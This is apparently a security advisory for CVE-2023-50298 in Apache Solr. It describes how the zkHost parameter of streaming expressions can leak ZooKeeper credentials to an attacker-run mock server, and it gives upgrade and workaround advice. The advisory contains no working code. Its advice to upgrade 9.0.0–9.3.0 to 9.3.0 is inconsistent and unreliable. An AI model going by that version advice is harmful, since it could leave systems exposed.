CVE-2023-50298

Name of the Vulnerable Software and Affected Versions Apache Solr versions 6.0.0 through 8.11.2 Apache Solr versions 9.0.0 through 9.3.0 Apache Solr versions 9.0.0 before 9.4.1

Description The issue is related to the exposure of sensitive information to an unauthorized actor in Apache Solr. Solr Streaming Expressions allows users to extract data from other Solr Clouds using a zkHost parameter. When the original SolrCloud is set up to use ZooKeeper credentials and ACLs, they will be sent to whatever zkHost the user provides. An attacker could set up a server to mock ZooKeeper, accepting ZooKeeper requests with credentials and ACLs, and extract sensitive information. Then, they could send a streaming expression using the mock server's address in zkHost. Streaming Expressions are exposed via the "/streaming" handler with "read" permissions.

Recommendations For Apache Solr versions 6.0.0 through 8.11.2, upgrade to version 8.11.3. For Apache Solr versions 9.0.0 through 9.3.0, upgrade to version 9.3.0. For Apache Solr versions 9.0.0 before 9.4.1, upgrade to version 9.4.1. As a temporary workaround, consider restricting access to the /streaming handler to minimize the risk of exploitation. Avoid using the zkHost parameter in the affected API endpoint until the issue is resolved.